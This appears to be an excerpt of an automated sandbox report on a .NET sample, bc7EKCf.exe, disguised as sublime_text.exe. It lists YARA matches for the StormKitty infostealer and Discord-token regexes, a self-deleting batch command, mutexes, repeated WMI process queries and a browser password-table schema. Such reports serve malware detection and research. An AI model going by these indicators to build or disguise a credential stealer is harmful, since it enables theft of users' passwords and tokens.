                Source: bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.Encodings.Web.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.00000000041A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1999962153.000000000673D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNito.AsyncEx.Context.dllJ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.IO.Pipelines.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Bcl.AsyncInterfaces.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2002327084.0000000006F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dll8 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2007888532.0000000007C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Tasks.Extensions.dllT vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Buffers.dll@ vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1999064795.0000000006650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs bc7EKCf.exe
                Source: bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNito.AsyncEx.Tasks.dllF vs bc7EKCf.exe
                Source: bc7EKCf.exeBinary or memory string: OriginalFilenamesublime_text.exe: vs bc7EKCf.exe
                Source: bc7EKCf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 2.2.bc7EKCf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                Source: 00000000.00000002.1799849511.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 00000000.00000002.1799849511.0000000004AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 00000002.00000002.1967670466.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 00000000.00000002.1819411564.00000000094C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: Process Memory Space: bc7EKCf.exe PID: 7272, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, test2.csCryptographic APIs: 'CreateDecryptor'
                Source: 2.2.bc7EKCf.exe.6f80000.13.raw.unpack, InflaterInputBuffer.csCryptographic APIs: 'TransformBlock'
                Source: 2.2.bc7EKCf.exe.6f80000.13.raw.unpack, DeflaterOutputStream.csCryptographic APIs: 'TransformBlock'
                Source: 2.2.bc7EKCf.exe.41a19f0.10.raw.unpack, InflaterInputBuffer.csCryptographic APIs: 'TransformBlock'
                Source: 2.2.bc7EKCf.exe.41a19f0.10.raw.unpack, DeflaterOutputStream.csCryptographic APIs: 'TransformBlock'
                Source: 2.2.bc7EKCf.exe.30c0000.2.raw.unpack, TaskCompletionSourceExtensions.csTask registration methods: 'CreateAsyncTaskSource'
                Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@79/456@29/19
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bc7EKCf.exe.logJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                Source: C:\Users\user\Desktop\bc7EKCf.exeMutant created: \Sessions\1\BaseNamedObjects\9DD47GQJ9DBN4RIEWPAV
                Source: C:\Users\user\Desktop\bc7EKCf.exeMutant created: \Sessions\1\BaseNamedObjects\oXXKwXtHVDUGKjYV
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile created: C:\Users\user\AppData\Local\Temp\tmp470E.tmpJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat"
                Source: bc7EKCf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: bc7EKCf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 7536)
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.0000000003482000.00000004.00000800.00020000.00000000.sdmp, tmpF955.tmp.dat.2.dr, Login Data.14.dr, tmp475E.tmp.dat.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
